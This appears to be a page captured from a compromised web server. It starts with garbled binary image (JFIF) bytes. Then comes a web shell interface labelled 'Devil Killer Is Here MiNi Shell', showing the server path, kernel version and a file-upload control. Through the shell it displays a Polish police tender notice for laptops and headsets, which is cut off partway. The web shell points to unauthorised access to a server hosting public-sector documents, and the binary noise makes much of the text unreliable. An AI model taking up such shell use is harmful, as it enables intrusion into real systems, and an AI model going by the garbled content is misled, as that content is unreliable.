JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230914/0039754001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wraz z dostarczeniem sprzętu informatycznego dla potrzeb jednostek Policji garnizonu mazowieckiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji z siedzibą w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670897379</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 37/59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47 701 31 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.kwp@ra.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.mazowiecka.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wraz z dostarczeniem sprzętu informatycznego dla potrzeb jednostek Policji garnizonu mazowieckiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-868bd8d9-52ee-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00397540</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00007485/30/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.13 Zakup wraz z dostarczeniem sprzętu informatycznego dla potrzeb jednostek Policji garnizonu mazowieckiego - z podziałem na zadanie nr 1, 2, 3, 4, 5, 6 i 7.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Porozumienie Województwa Mazowieckiego Nr W/UMWM-UU/POR/OR/4613/2023 z dnia 10 lipca 2023r. Projekt „K9 EUROPE” – finansowany z Mechanizmu Finansowego EOG </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/kwp_radom (inna niż oferta Wykonawcy i załączniki do oferty) za pośrednictwem dedykowanego formularza poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po którym pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia z BZP a dodatkowo numerem wewnętrznym postępowania.<br/>3. Wykonawca ma dostęp do formularza „Wyślij wiadomość do zamawiającego” dostępny na stronie dotyczącej danego postępowania.<br/>4. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/pn/kwp_radom do konkretnego Wykonawcy.<br/>5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>https://platformazakupowa.pl/pn/kwp_radom przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub<br/>powiadomienie może trafić do folderu SPAM.<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przy użyciu środków komunikacji<br/>elektronicznej, określają „REGULAMIN platformazakupowa.pl”, który znajduje się na stronie głównej Platformy oraz „Instrukcja dla<br/>Wykonawców platformazakupowa.pl” dostępna jest pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>7. Maksymalny rozmiar jednego pliku przesyłanego za pomocą dedykowanego formularza przy komunikacji to maksymalnie 500 MB.<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: malgorzata.wojcik@ra.policja.gov.pl<br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanej w SWZ.<br/>10. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MSWindows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików.pdf,<br/>f) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szanowna Pani/Szanowny Panie,<br/>w związku z wejściem w życie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) z dnia 27 kwietnia 2016 r. (Dz. Urz. UE. L Nr 119, str. 1), dalej „RODO”, dochowując warunków w nim zawartych informujemy, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji z siedzibą w Radomiu - adres: ul. 11-go Listopada 37/59, 26-600 Radom.<br/>2.	Nadzór nad prawidłowym przetwarzaniem danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu sprawuje inspektor ochrony danych: Sylwia Fila - adres: ul. 11-go Listopada 37/59, 26-600 Radom - e-mail: iod.kwp@ra.policja.gov.pl.<br/>3.	Cel i okres przetwarzania danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu.<br/>W KWP z siedzibą w Radomiu dane osobowe przetwarza się wyłącznie w konkretnych, wyraźnych i prawnie uzasadnionych celach i nie przetwarza się ich dalej w sposób niezgodny z tymi celami. Przetwarzanie danych jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze (art. 6 ust.1 lit. c RODO) zgodnie z:<br/>-	Ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych – dalej zwaną ustawą Pzp,<br/>-	Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, <br/>-	Dyrektywą Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylająca dyrektywę 2004/18/WE.<br/>Okres przetwarzania danych osobowych wynika bezpośrednio z przepisów prawa i jest adekwatny do celów.<br/>4.	Odbiorcy danych osobowych.<br/>W rozumieniu RODO odbiorcami danych osobowych nie są organy publiczne, które mogą otrzymywać dane osobowe w ramach konkretnego postępowania zgodnie z prawem Unii lub prawem państwa członkowskiego. Dane osobowe nie są udostępniane podmiotom innym niż uprawnione na podstawie przepisów prawa. Dane będą udostępniane uprawnionym podmiotom jedynie w celu umożliwienia korzystania ze środków ochrony prawnej oraz tylko do upływu terminu na ich wniesienie.<br/>5.	Osobom, których dane są przetwarzane zgodnie z RODO przysługuje:<br/>-	prawo dostępu do własnych danych osobowych na zasadach określonych w ustawie Pzp,<br/>-	prawo do żądania od administratora sprostowania, uzupełnienia danych, jednak nie może ono skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp, <br/>-	prawo do ograniczenia przetwarzania własnych danych osobowych, ale to nie może ograniczać przetwarzania danych osobowych do czasu zakończenia postępowania, <br/>-	prawo do wniesienia sprzeciwu wobec przetwarzania w sytuacjach przewidzianych prawem,<br/>-	prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO.<br/>6.	Przy przetwarzaniu danych osobowych w trybie RODO nie występuje zautomatyzowane podejmowanie decyzji o przetwarzaniu danych osobowych, w tym profilowanie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">34/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 – Laptop z pakietem aplikacji biurowych zgodny z OPZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48620000-0 - Systemy operacyjne</p> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadania nr 1.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -20 %<br/>c.	Termin dostawy „D” - 20 %.<br/><br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/> <br/>gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 36 miesięcy). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 36 miesięcy, maksymalny 60 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 60 miesięcy, ocenie będzie podlegał okres 60 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 36 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 36 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 36≤ 47 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 ≤ 59 miesięcy – 10 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 60 miesięcy – 20 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 36 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 15 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 15 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 7 dni kalendarzowych deklarowanego „Terminu dostawy” – 20 punktów;<br/>	oferta zawierająca w przedziale 8 ÷ 14 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 15 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 15 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 – Słuchawki zgodne z OPZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32342100-3 - Słuchawki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadań nr 2, 3, 4, 5, 6 i 7.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -30 %<br/>c.	Termin dostawy „D” - 10 %.<br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/><br/> gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalny 48 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 24 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 24≤ 35 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 36 ≤ 47 miesięcy – 15 